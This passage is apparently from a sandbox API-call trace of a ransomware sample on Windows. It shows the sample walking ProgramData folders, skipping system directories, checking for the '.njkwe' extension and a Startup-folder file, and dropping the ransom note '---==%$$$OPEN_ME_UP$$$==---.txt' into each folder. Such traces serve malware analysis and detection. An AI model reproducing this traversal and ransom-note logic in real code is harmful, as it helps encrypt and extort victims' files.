lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0073.049] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.049] FindNextFileW (in: hFindFile=0xc19e20, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x62088d76, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x62088d76, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x62088d76, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xdff5, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="print_queue.ico", cAlternateFileName="")) returned 1 [0073.049] lstrcmpiW (lpString1="print_queue.ico", lpString2="Windows") returned -1 [0073.049] lstrcmpiW (lpString1="print_queue.ico", lpString2="$Recycle.bin") returned 1 [0073.049] lstrcmpiW (lpString1="print_queue.ico", lpString2="System Volume Information") returned -1 [0073.049] lstrcmpiW (lpString1="print_queue.ico", lpString2="Program Files") returned -1 [0073.049] lstrcmpiW (lpString1="print_queue.ico", lpString2="Program Files (x86)") returned -1 [0073.049] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico") returned 101 [0073.049] StrStrIW (lpFirst="print_queue.ico", lpSrch=".njkwe") returned 0x0 [0073.049] lstrcmpW (lpString1="print_queue.ico", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0073.049] lstrcmpW (lpString1="print_queue.ico", lpString2="taridd") returned -1 [0073.049] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0073.049] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.049] FindNextFileW (in: hFindFile=0xc19e20, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x62088d76, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x62088d76, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x62088d76, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xec75, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="scan_.ico", cAlternateFileName="")) returned 1 [0073.049] lstrcmpiW (lpString1="scan_.ico", lpString2="Windows") returned -1 [0073.050] lstrcmpiW (lpString1="scan_.ico", lpString2="$Recycle.bin") returned 1 [0073.050] lstrcmpiW (lpString1="scan_.ico", lpString2="System Volume Information") returned -1 [0073.050] lstrcmpiW (lpString1="scan_.ico", lpString2="Program Files") returned 1 [0073.050] lstrcmpiW (lpString1="scan_.ico", lpString2="Program Files (x86)") returned 1 [0073.050] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico") returned 95 [0073.050] StrStrIW (lpFirst="scan_.ico", lpSrch=".njkwe") returned 0x0 [0073.050] lstrcmpW (lpString1="scan_.ico", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0073.050] lstrcmpW (lpString1="scan_.ico", lpString2="taridd") returned -1 [0073.050] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0073.050] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.050] FindNextFileW (in: hFindFile=0xc19e20, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x62088d76, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x62088d76, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x62088d76, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x10654, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="scan_property.ico", cAlternateFileName="")) returned 1 [0073.050] lstrcmpiW (lpString1="scan_property.ico", lpString2="Windows") returned -1 [0073.050] lstrcmpiW (lpString1="scan_property.ico", lpString2="$Recycle.bin") returned 1 [0073.050] lstrcmpiW (lpString1="scan_property.ico", lpString2="System Volume Information") returned -1 [0073.050] lstrcmpiW (lpString1="scan_property.ico", lpString2="Program Files") returned 1 [0073.050] lstrcmpiW (lpString1="scan_property.ico", lpString2="Program Files (x86)") returned 1 [0073.050] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico") returned 103 [0073.050] StrStrIW (lpFirst="scan_property.ico", lpSrch=".njkwe") returned 0x0 [0073.050] lstrcmpW (lpString1="scan_property.ico", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0073.050] lstrcmpW (lpString1="scan_property.ico", lpString2="taridd") returned -1 [0073.050] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0073.050] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.050] FindNextFileW (in: hFindFile=0xc19e20, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x62062b13, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x62062b13, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x62062b13, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xf8c2, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="scan_settings.ico", cAlternateFileName="")) returned 1 [0073.050] lstrcmpiW (lpString1="scan_settings.ico", lpString2="Windows") returned -1 [0073.050] lstrcmpiW (lpString1="scan_settings.ico", lpString2="$Recycle.bin") returned 1 [0073.050] lstrcmpiW (lpString1="scan_settings.ico", lpString2="System Volume Information") returned -1 [0073.050] lstrcmpiW (lpString1="scan_settings.ico", lpString2="Program Files") returned 1 [0073.050] lstrcmpiW (lpString1="scan_settings.ico", lpString2="Program Files (x86)") returned 1 [0073.050] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico") returned 103 [0073.050] StrStrIW (lpFirst="scan_settings.ico", lpSrch=".njkwe") returned 0x0 [0073.050] lstrcmpW (lpString1="scan_settings.ico", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0073.050] lstrcmpW (lpString1="scan_settings.ico", lpString2="taridd") returned -1 [0073.051] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0073.051] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.051] FindNextFileW (in: hFindFile=0xc19e20, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x62062b13, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x62062b13, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x62062b13, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2c64, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="tasks.xml", cAlternateFileName="")) returned 1 [0073.051] lstrcmpiW (lpString1="tasks.xml", lpString2="Windows") returned -1 [0073.051] lstrcmpiW (lpString1="tasks.xml", lpString2="$Recycle.bin") returned 1 [0073.051] lstrcmpiW (lpString1="tasks.xml", lpString2="System Volume Information") returned 1 [0073.051] lstrcmpiW (lpString1="tasks.xml", lpString2="Program Files") returned 1 [0073.051] lstrcmpiW (lpString1="tasks.xml", lpString2="Program Files (x86)") returned 1 [0073.051] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml") returned 95 [0073.051] StrStrIW (lpFirst="tasks.xml", lpSrch=".njkwe") returned 0x0 [0073.051] lstrcmpW (lpString1="tasks.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0073.051] lstrcmpW (lpString1="tasks.xml", lpString2="taridd") returned 1 [0073.051] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0073.051] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.051] FindNextFileW (in: hFindFile=0xc19e20, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x62062b13, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x62062b13, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x62062b13, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2c64, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="tasks.xml", cAlternateFileName="")) returned 0 [0073.051] FindClose (in: hFindFile=0xc19e20 | out: hFindFile=0xc19e20) returned 1 [0073.051] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 117 [0073.051] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0073.052] WriteFile (in: hFile=0x434, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f054, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f054*=0x351, lpOverlapped=0x0) returned 1 [0073.053] CloseHandle (hObject=0x434) returned 1 [0073.053] GetProcessHeap () returned 0xbe0000 [0073.053] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0073.053] FindNextFileW (in: hFindFile=0xc19c60, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbd64a757, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b2a1d79, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="{e35be42d-f742-4d96-a50a-1775fb1a7a42}", cAlternateFileName="{E35BE~1")) returned 0 [0073.053] FindClose (in: hFindFile=0xc19c60 | out: hFindFile=0xc19c60) returned 1 [0073.053] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 78 [0073.053] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0073.055] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f2dc, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f2dc*=0x351, lpOverlapped=0x0) returned 1 [0073.055] CloseHandle (hObject=0x430) returned 1 [0073.056] GetProcessHeap () returned 0xbe0000 [0073.056] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc29660 | out: hHeap=0xbe0000) returned 1 [0073.056] FindNextFileW (in: hFindFile=0xc19ce0, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbd555071, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17c95299, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Task", cAlternateFileName="")) returned 0 [0073.056] FindClose (in: hFindFile=0xc19ce0 | out: hFindFile=0xc19ce0) returned 1 [0073.056] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 73 [0073.056] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\device stage\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0073.056] WriteFile (in: hFile=0x42c, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f564, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f564*=0x351, lpOverlapped=0x0) returned 1 [0073.057] CloseHandle (hObject=0x42c) returned 1 [0073.057] GetProcessHeap () returned 0xbe0000 [0073.057] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0073.057] FindNextFileW (in: hFindFile=0xc19fa0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbd64c64e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17c95299, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="DeviceSync", cAlternateFileName="DEVICE~2")) returned 1 [0073.057] lstrcmpiW (lpString1="DeviceSync", lpString2="Windows") returned -1 [0073.057] lstrcmpiW (lpString1="DeviceSync", lpString2="$Recycle.bin") returned 1 [0073.057] lstrcmpiW (lpString1="DeviceSync", lpString2="System Volume Information") returned -1 [0073.057] lstrcmpiW (lpString1="DeviceSync", lpString2="Program Files") returned -1 [0073.057] lstrcmpiW (lpString1="DeviceSync", lpString2="Program Files (x86)") returned -1 [0073.057] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\DeviceSync") returned 39 [0073.057] lstrcmpW (lpString1="DeviceSync", lpString2=".") returned 1 [0073.057] lstrcmpW (lpString1="DeviceSync", lpString2="..") returned 1 [0073.057] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\DeviceSync", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0073.057] GetProcessHeap () returned 0xbe0000 [0073.057] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0073.057] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\DeviceSync\\*") returned 41 [0073.057] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\DeviceSync\\*", lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbd64c64e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17c95299, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a120 [0073.058] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0073.059] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0073.059] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0073.059] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0073.059] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0073.059] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\DeviceSync\\.") returned 41 [0073.059] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.059] FindNextFileW (in: hFindFile=0xc1a120, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbd64c64e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17c95299, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0073.059] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0073.059] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0073.059] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0073.059] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0073.059] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0073.059] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\DeviceSync\\..") returned 42 [0073.059] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0073.059] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.059] FindNextFileW (in: hFindFile=0xc1a120, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbd64c64e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17c95299, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 0 [0073.059] FindClose (in: hFindFile=0xc1a120 | out: hFindFile=0xc1a120) returned 1 [0073.059] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\DeviceSync\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 71 [0073.059] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\DeviceSync\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\devicesync\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0073.060] WriteFile (in: hFile=0x42c, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f564, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f564*=0x351, lpOverlapped=0x0) returned 1 [0073.061] CloseHandle (hObject=0x42c) returned 1 [0073.061] GetProcessHeap () returned 0xbe0000 [0073.061] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0073.061] FindNextFileW (in: hFindFile=0xc19fa0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb85cc8d2, ftLastAccessTime.dwHighDateTime=0x1d33839, ftLastWriteTime.dwLowDateTime=0xb85cc8d2, ftLastWriteTime.dwHighDateTime=0x1d33839, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Diagnosis", cAlternateFileName="DIAGNO~1")) returned 1 [0073.061] lstrcmpiW (lpString1="Diagnosis", lpString2="Windows") returned -1 [0073.061] lstrcmpiW (lpString1="Diagnosis", lpString2="$Recycle.bin") returned 1 [0073.061] lstrcmpiW (lpString1="Diagnosis", lpString2="System Volume Information") returned -1 [0073.061] lstrcmpiW (lpString1="Diagnosis", lpString2="Program Files") returned -1 [0073.062] lstrcmpiW (lpString1="Diagnosis", lpString2="Program Files (x86)") returned -1 [0073.062] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis") returned 38 [0073.062] lstrcmpW (lpString1="Diagnosis", lpString2=".") returned 1 [0073.062] lstrcmpW (lpString1="Diagnosis", lpString2="..") returned 1 [0073.062] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0073.062] GetProcessHeap () returned 0xbe0000 [0073.062] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0073.062] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\*") returned 40 [0073.062] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\*", lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb85cc8d2, ftLastAccessTime.dwHighDateTime=0x1d33839, ftLastWriteTime.dwLowDateTime=0xb85cc8d2, ftLastWriteTime.dwHighDateTime=0x1d33839, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a160 [0073.063] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0073.063] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0073.063] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0073.063] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0073.063] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0073.063] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\.") returned 40 [0073.063] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.063] StrStrIW (lpFirst=".", lpSrch=".njkwe") returned 0x0 [0073.063] lstrcmpW (lpString1=".", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned -1 [0073.063] lstrcmpW (lpString1=".", lpString2="taridd") returned -1 [0073.063] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\.", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0073.063] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\." (normalized: "c:\\programdata\\microsoft\\diagnosis\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, 